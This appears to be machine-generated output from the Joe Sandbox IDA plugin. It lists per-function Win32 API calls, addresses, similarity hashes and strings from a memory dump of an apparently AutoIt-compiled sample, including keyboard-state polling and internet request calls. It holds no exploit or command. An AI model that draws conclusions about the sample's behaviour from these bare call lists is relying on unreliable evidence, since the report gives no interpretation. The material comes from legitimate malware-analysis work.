                                                                                                                                                                                                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5ca35fce2e4a3d3cee9ba27b0f210bf9116e07c821665500e468f8820602f0ee
                                                                                                                                                                                                                                                                                                    • Instruction ID: 02601dc015dec3f0eb3349403249315122ed608cea3b99285869ef34889c8905
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ca35fce2e4a3d3cee9ba27b0f210bf9116e07c821665500e468f8820602f0ee
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E412175A00219DFCB10DFA4DC44DEEBBB9FF48354F00C469E95AA7261C774A946CB90
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00A7A65D
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00A7A6DE
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00A7A6F9
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00A7A713
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00A7A728
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00A7A740
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 00A7A752
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00A7A76A
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 00A7A77C
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00A7A794
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00A7A7A6
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9c4cc38a8f662fc8d30da032a073aa52078e31c9c567517dae13a194349867fe
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1017574e6425700298b42ffdca512bfd0e49be6c8435a8f05cf5f090c03387f0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c4cc38a8f662fc8d30da032a073aa52078e31c9c567517dae13a194349867fe
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA4196646047CA7DFF3997608C443ADBEB06BB5344F08C059D5CA9A5C2EBA499C4C753
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                                                    • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                                                    • Opcode ID: e07045e6c8ce8a97a33a136b9a4731b6cc67212e92029bf6c2c1057138cdb29f
                                                                                                                                                                                                                                                                                                    • Instruction ID: dd38142c3df57c7f63a9ca4ad08b799adf8fe0944f5dfa2f3dac7a842f43f955
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e07045e6c8ce8a97a33a136b9a4731b6cc67212e92029bf6c2c1057138cdb29f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE519F31B00516ABCF14DFACC9519BEB7E5BF65360B20822DE866E7294EB31DE41C790
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32 ref: 00A941D1
                                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00A941DC
                                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00AB0B44,?), ref: 00A94236
                                                                                                                                                                                                                                                                                                    • IIDFromString.OLE32(?,?), ref: 00A942A9
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00A94341
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00A94393
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                                                    • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                                                                                    • Opcode ID: 16f5b4f5d6dc70c91f05a03c6db07293cb2ae3559c91d66b0eec195b99434d0d
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7cc760122cc540e3e3c002abf57cb0733c535e9586d464131343916d3a8f54ac
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16f5b4f5d6dc70c91f05a03c6db07293cb2ae3559c91d66b0eec195b99434d0d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B061AD70708301AFCB10DF64C989FAABBE4BF49714F000919F4869B291DB70ED46CB92
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 00A88C9C
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00A88CAC
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A88CB8
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A88D55
• SetCurrentDirectoryW.KERNEL32(?), ref: 00A88D69
• SetCurrentDirectoryW.KERNEL32(?), ref: 00A88D9B
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A88DD1
• SetCurrentDirectoryW.KERNEL32(?), ref: 00A88DDA
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local$System
• String ID: *.*
• API String ID: 1464919966-438819550
• Opcode ID: 9299be9e6e08f41a2ea6ecbfafe75a25160e04e7cf7723a57d62d92e06df5aa3
• Instruction ID: eb3673fde31c1650b173ba77a3628d650915676a646b86adca0b21c660931ac0
• Opcode Fuzzy Hash: 9299be9e6e08f41a2ea6ecbfafe75a25160e04e7cf7723a57d62d92e06df5aa3
• Instruction Fuzzy Hash: A96148B2504305AFCB10EF60C9459DEB3E8FF99310F44892EF99987291DB39E945CB92
APIs
• CreateMenu.USER32 ref: 00AA4715
• SetMenu.USER32(?,00000000), ref: 00AA4724
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AA47AC
• IsMenu.USER32(?), ref: 00AA47C0
• CreatePopupMenu.USER32 ref: 00AA47CA
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AA47F7
• DrawMenuBar.USER32 ref: 00AA47FF
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup
• String ID: 0$F
• API String ID: 161812096-3044882817
• Opcode ID: e63f735d5d6fb3dc8f8624cbf035041227e3178b4bf9f04fa8d58cddd1fa0e78
• Instruction ID: 7f5b2c697a94535dbdac5c4ecd35e859e73b69f8cbcb21a5a0faa36c73dc67ea
• Opcode Fuzzy Hash: e63f735d5d6fb3dc8f8624cbf035041227e3178b4bf9f04fa8d58cddd1fa0e78
• Instruction Fuzzy Hash: A5417A75A0124AEFDB14DFA4E884EAA7BB5FF8E314F144028FA4697390D7B4A911CB50
APIs
  • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
  • Part of subcall function 00A745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A74620
• SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00A728B1
• GetDlgCtrlID.USER32 ref: 00A728BC
• GetParent.USER32 ref: 00A728D8
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00A728DB
• GetDlgCtrlID.USER32(?), ref: 00A728E4
• GetParent.USER32(?), ref: 00A728F8
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00A728FB
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName_wcslen
• String ID: ComboBox$ListBox
• API String ID: 711023334-1403004172
• Opcode ID: aabc559651867eb3b0a3769af9436962f245e8f60c76e7c8a34325d249896a29
• Instruction ID: 0bc1d7b5e2a3373e972c45365250ca2211068c5b48eb4eb9b9be183fd05051c1
• Opcode Fuzzy Hash: aabc559651867eb3b0a3769af9436962f245e8f60c76e7c8a34325d249896a29
• Instruction Fuzzy Hash: 8D21B075900118BBCF14EFA0CC85EEEBBB8EF0A350F008156B9A6A72D1DB354859DB60
APIs
  • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
  • Part of subcall function 00A745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A74620
• SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00A72990
• GetDlgCtrlID.USER32 ref: 00A7299B
• GetParent.USER32 ref: 00A729B7
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00A729BA
• GetDlgCtrlID.USER32(?), ref: 00A729C3
• GetParent.USER32(?), ref: 00A729D7
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00A729DA
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName_wcslen
• String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                    • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00AA4539
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00AA453C
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00AA4563
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AA4586
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00AA45FE
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00AA4648
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00AA4663
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00AA467E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00AA4692
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00AA46AF
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00A7BB18
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00A7ABA8,?,00000001), ref: 00A7BB2C
                                                                                                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00A7BB33
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A7ABA8,?,00000001), ref: 00A7BB42
                                                                                                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A7BB54
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00A7ABA8,?,00000001), ref: 00A7BB6D
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A7ABA8,?,00000001), ref: 00A7BB7F
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00A7ABA8,?,00000001), ref: 00A7BBC4
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00A7ABA8,?,00000001), ref: 00A7BBD9
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00A7ABA8,?,00000001), ref: 00A7BBE4
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A43007
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A42D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A4DB51,00AE1DC4,00000000,00AE1DC4,00000000,?,00A4DB78,00AE1DC4,00000007,00AE1DC4,?,00A4DF75,00AE1DC4), ref: 00A42D4E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A42D38: GetLastError.KERNEL32(00AE1DC4,?,00A4DB51,00AE1DC4,00000000,00AE1DC4,00000000,?,00A4DB78,00AE1DC4,00000007,00AE1DC4,?,00A4DF75,00AE1DC4,00AE1DC4), ref: 00A42D60
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A43013
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4301E
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A43029
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A43034
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4303F
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4304A
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A43055
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A43060
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4306E
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A12AF9
                                                                                                                                                                                                                                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 00A12B98
                                                                                                                                                                                                                                                                                                    • UnregisterHotKey.USER32(?), ref: 00A12D7D
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00A53A1B
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00A53A80
                                                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A53AAD
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                                                    • String ID: close all
                                                                                                                                                                                                                                                                                                    • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A889F2
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00A88A06
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00A88A30
                                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00A88A4A
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00A88A5C
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00A88AA5
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A88AF5
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                                                                                                    • API String ID: 769691225-438819550
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00A174D7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A17567: GetClientRect.USER32(?,?), ref: 00A1758D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A17567: GetWindowRect.USER32(?,?), ref: 00A175CE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A17567: ScreenToClient.USER32(?,?), ref: 00A175F6
                                                                                                                                                                                                                                                                                                    • GetDC.USER32 ref: 00A56083
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00A56096
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00A560A4
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00A560B9
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00A560C1
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00A56152
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                                                                    • String ID: U
                                                                                                                                                                                                                                                                                                    • API String ID: 4009187628-3372436214
APIs
  • Part of subcall function 00A1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A124B0
  • Part of subcall function 00A119CD: GetCursorPos.USER32(?), ref: 00A119E1
  • Part of subcall function 00A119CD: ScreenToClient.USER32(00000000,?), ref: 00A119FE
  • Part of subcall function 00A119CD: GetAsyncKeyState.USER32(00000001), ref: 00A11A23
  • Part of subcall function 00A119CD: GetAsyncKeyState.USER32(00000002), ref: 00A11A3D
• ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00AA95C7
• ImageList_EndDrag.COMCTL32 ref: 00AA95CD
• ReleaseCapture.USER32 ref: 00AA95D3
• SetWindowTextW.USER32(?,00000000), ref: 00AA966E
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00AA9681
• DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00AA975B
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
• String ID: @GUI_DRAGFILE$@GUI_DROPID
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A8CCB7
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A8CCDF
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A8CD0F
• GetLastError.KERNEL32 ref: 00A8CD67
• SetEvent.KERNEL32(?), ref: 00A8CD7B
• InternetCloseHandle.WININET(00000000), ref: 00A8CD86
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00A555AE,?,?,Bad directive syntax error,00AADCD0,00000000,00000010,?,?), ref: 00A7A236
• LoadStringW.USER32(00000000,?,00A555AE,?), ref: 00A7A23D
  • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00A7A301
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: HandleLoadMessageModuleString_wcslen
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
APIs
• GetParent.USER32 ref: 00A729F8
• GetClassNameW.USER32(00000000,?,00000100), ref: 00A72A0D
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00A72A9A
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
